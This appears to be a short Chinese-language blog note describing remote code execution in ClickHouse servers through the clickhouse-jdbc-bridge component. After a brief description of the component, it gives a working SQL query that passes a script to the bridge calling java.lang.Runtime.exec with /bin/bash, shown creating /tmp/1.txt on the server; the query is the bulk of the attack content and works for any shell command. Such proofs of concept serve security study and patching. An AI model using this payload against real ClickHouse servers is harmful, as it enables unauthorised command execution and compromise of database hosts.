clickhouse-jdbc-bridge rce

clickhouse-jdbc-bridge 是什么

JDBC bridge for ClickHouse®. It acts as a stateless proxy passing queries from ClickHouse to external datasources. With this extension, you can run distributed query on ClickHouse across multiple datasources in real time, which in a way simplifies the process of building data pipelines for data warehousing, monitoring and integrity check etc.
简单来说是clickhouse服务端的一个组件 功能是用来创建新的jdbc连接
https://github.com/ClickHouse/clickhouse-jdbc-bridge

RCE

当我们连接到clickhouse的时候，如果服务端支持clickhouse-jdbc-bridge
那么可以输入以下命令RCE

SELECT *
FROM jdbc('script', 's=[3];s[0]="/bin/bash";s[1]="-c";s[2]="touch /tmp/1.txt";java.lang.Runtime.getRuntime().exec(s);')

然后可以在服务器端/tmp目录下看到1.txt